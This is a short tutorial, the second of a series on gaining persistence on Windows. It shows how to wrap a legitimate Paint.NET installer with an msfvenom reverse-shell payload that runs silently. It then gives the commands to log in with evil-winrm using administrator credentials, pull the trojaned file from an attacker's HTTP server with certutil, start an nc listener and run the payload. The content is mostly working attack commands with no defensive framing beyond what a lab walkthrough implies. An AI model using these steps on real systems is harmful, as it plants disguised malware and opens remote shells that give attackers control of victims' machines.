Persistence on Windows with BackDoors (2/4)

2. Using executable files modified by msfvenom

Let’s continue placing payload on target machine. We can modify any mini-tools for Windows such as PuTTy, Winrar, Photo Editors, StickyNotes; which can be downloaded from internet. I will go one of external Paint software.

Here is the download link: https://www.getpaint.net/download.html

It’s downloaded to the attacker’s machine and modified with msfvenom (payload generator) on Kali.

msfvenom -a x64 --platform windows -x paint.net.5.0.3.exe -k -p windows/x64/shell_reverse_tcp lhost=attacker_IP lport=listener_nc -b "\x00" -f exe -o paint.exe

-a for integer capability

-- platform for OS

-x for file to be modified

-k for executing the payload on the background silently

-p for payload

-f for file the type for payload

-o for rename the payload

Now, we can access the target with previously gained credentials to transfer the payload

evil-winrm -i target_IP -u Administrator -p Password321

We can pull the payload to the target machine using certutil, over http-server of attacker.

certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe

Start listener with nc on attacker machine: nc -lvp 4444

then, execute the transferred payload on gained shell: ./paint.exe

Read the 3rd alternative: Dumping hashes and assigning admin privileges for unprivileged users